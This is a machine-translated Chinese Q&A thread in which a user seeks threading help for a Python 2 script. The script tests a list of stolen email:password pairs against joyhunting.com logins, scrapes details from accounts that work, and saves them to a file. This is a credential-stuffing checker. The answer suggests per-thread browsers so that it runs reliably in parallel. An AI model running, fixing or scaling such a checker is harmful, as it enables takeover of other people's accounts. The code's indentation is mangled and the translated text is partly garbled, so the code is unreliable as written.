2010-10-01 124 views
0

地獄所有。python線程隊列問題

我作了一些Python腳本線程該檢查一些帳戶的一些網站

存在,如果我運行的線程1,它的工作很好,但如果增加線程諸如此類3〜5以上,

結果是非常不同與螺紋1相比,我手動檢查和

如果我增加線程結果是不正確的。

我想我的一些線程代碼必須調整或如何使用隊列模塊?

任何人都可以建議或調整我的腳本?提前致謝!

# -*- coding: cp949 -*- 
import sys,os 
import mechanize, urllib 
import cookielib 
import re 
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag 
import re,sys,os,mechanize,urllib,threading,time 

# Maximum number of process to spawn at any one given time. 
MAX_PROCS =5 

maillist = "daum.txt" 
threads = [] 
SAVEFILE = 'valid_joyhunt.txt' 

# Threading class 
class CheckMyThread (threading.Thread): 
llemail = "" 
llpassword = "" 
def __init__ (self , lemail, lpassword): 
    self.llemail = lemail 
    self.llpassword = lpassword 
    threading.Thread.__init__(self) 
    pass 

def run (self): 
    valid = [] 
    llemail = self.llemail 
    llpassword = self.llpassword 
    try: 
    params = urllib.urlencode({'userid':llemail, 'passwd':llpassword}) 
    rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params) 
    rs = mechanize.urlopen(rq) 
    data = rs.read()  
    logged_in = r'var _id' in data     #정상 로그인       
    if logged_in : 
     rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp") 
     rs = mechanize.urlopen(rq) 
     maindata = rs.read(50024) 
     jun_member = r"준회원" 
     save = open(SAVEFILE, 'a') 
     for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata): 
     matched = match.group(1)  
     for match2 in re.finditer(r"var _gd(.*?);", data): 
     matched2 = match2.group(1) 
     print '%s, %s' %(matched, matched2) 
     break 
     rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined") 
     rs1=mechanize.urlopen(rq1) 
     sendmsg= rs1.read() 
     #print sendmsg  
     match3 = '' 
     for match3 in re.finditer(r":'\+(.*?)\);", sendmsg): 
     matched3 = match3.group(1) 
     #print matched3 
     print 'bad' 
     break 
     if match3 =='': 
     save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n')) 
     save.close()  
     print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)     
    else: 
    print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword) 
    return 0    
    except: 
    print '[!] Exception checking %s.' % (llemail) 
    return 1 
    return 0 
try: 
listhandle = open(maillist); 
#Bail out if the file doesn't exist 
except: 
print '[!] %s does not exist. Please create the file!' % (maillist) 
exit (2) 

#Loop through the file 
for line in listhandle: 
#Parse the line 
try: 
    details = line.split(':') 
    email = details[0] 
    password = details[1].replace('\n', '') 

#Throw an error and exit. 
except: 
    print '[!] Parse Error in %s on line %n.' % (maillist, currline) 
    exit 

#Run a while statement: 
if len(threads) < MAX_PROCS: 
    #Fork out into another process 
    print '[ ] Starting thread to check account %s.' % (email); 
    thread = CheckMyThread(email, password) 
    thread.start() 
    threads.append(thread) 

else: 
    #Wait for a thread to exit. 
    gonext = 0 
    while 1 == 1: 
    i = 0 
    #print '[ ] Checking for a thread to exit...' 
    while i < len(threads): 
    #print '[ ] %d' % (i) 
    try: 
    if threads[i]: 
     if not threads[i].isAlive(): 
     #print '[-] Thread %d is dead' % (i) 
     threads.pop(i) 
     print '[ ] Starting thread to check account %s.' % (email); 
     thread = CheckMyThread(email, password) 
     thread.start() 
     threads.append(thread) 
     gonext = 1 
     break 
     else: 
     #print '[+] Thread %d is still running' % (i) 
     pass 
    else: 
     print '[ ] Crap.'; 
    except NameError: 
    print '[ ] AWWW COME ON!!!!' 
    i = i + 1 
    time.sleep(0.050); 
    if gonext: 
    break 

回答

0

你能指定什麼是不同的結果嗎?

從我看到的情況來看,代碼的功能遠遠超過驗證帳戶。

從我所看到的,你從多個線程追加到單個文件,我會說它不是線程安全的。

此外,AFAIK機械化使用共享cookie存儲的所有請求,所以他們可能會干擾。在run()內部使用單獨的mechanize.Browser()而不是mechanize.Request()

+0

嗨,如果我運行線程1,驗證帳戶結果是正確的,但如果我運行多個線程結果是不正確的,一些帳戶活着,但導致檢查死亡。我如何使線程安全或使用隊列使線程安全。在此先感謝..sorry我的英語 – paul 2010-10-11 05:02:27

+0

問題似乎與機械化共享Cookie存儲(可能使用'CookieJar'而不是'瀏覽器()'?)。無論如何;爲什麼你堅持使用隊列?這不是神奇的線程安全子彈。 – Almad 2010-10-11 15:26:46